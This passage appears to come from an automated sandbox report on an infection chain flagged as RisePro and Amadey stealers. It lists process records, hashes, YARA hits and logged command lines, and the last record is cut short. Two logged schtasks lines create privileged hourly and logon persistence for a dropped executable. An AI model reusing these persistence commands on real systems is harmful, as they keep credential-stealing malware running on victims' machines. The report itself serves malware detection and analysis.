                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:21:34:15
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                        Imagebase:0x8f0000
                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:21:34:15
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:21:34:16
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                        Imagebase:0x8f0000
                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:21:34:16
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                        Start time:21:34:16
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
                                                                                                                                                                                                                                        Imagebase:0xd0000
                                                                                                                                                                                                                                        File size:1'166'336 bytes
                                                                                                                                                                                                                                        MD5 hash:81A8F98229FF9CD694A2CB7389D22EF8
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:21:34:16
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:21:34:16
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:21:34:17
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:21:34:17
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        Imagebase:0xee0000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:21:34:17
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        Imagebase:0xee0000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:21:34:18
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,1160871462993257416,2185165771260797926,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:21:34:23
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:21:34:23
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                        File size:1'910'784 bytes
                                                                                                                                                                                                                                        MD5 hash:169D873778A229BCB4F010F87930CB28
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:21:34:24
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:21:34:28
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:21:34:31
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000012001\amert.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000012001\amert.exe"
                                                                                                                                                                                                                                        Imagebase:0x860000
                                                                                                                                                                                                                                        File size:1'954'304 bytes
                                                                                                                                                                                                                                        MD5 hash:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000002.2451043145.0000000000861000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000003.2360399183.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:21:34:31
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:21:34:31
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:21:34:32
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:21:34:33
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:21:34:34
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                                                                                                                                                                                                                        Imagebase:0xd50000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:21:34:37
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:21:34:38
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:21:34:38
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:21:34:38
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:21:34:40
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:21:34:41
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        Imagebase:0xa00000
                                                                                                                                                                                                                                        File size:1'954'304 bytes
                                                                                                                                                                                                                                        MD5 hash:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000003.2448505563.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000002.2489688651.0000000000A01000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:21:34:42
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
                                                                                                                                                                                                                                        Imagebase:0xd0000
                                                                                                                                                                                                                                        File size:1'166'336 bytes
                                                                                                                                                                                                                                        MD5 hash:81A8F98229FF9CD694A2CB7389D22EF8
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:21:34:43
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                        Start time:21:34:43
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
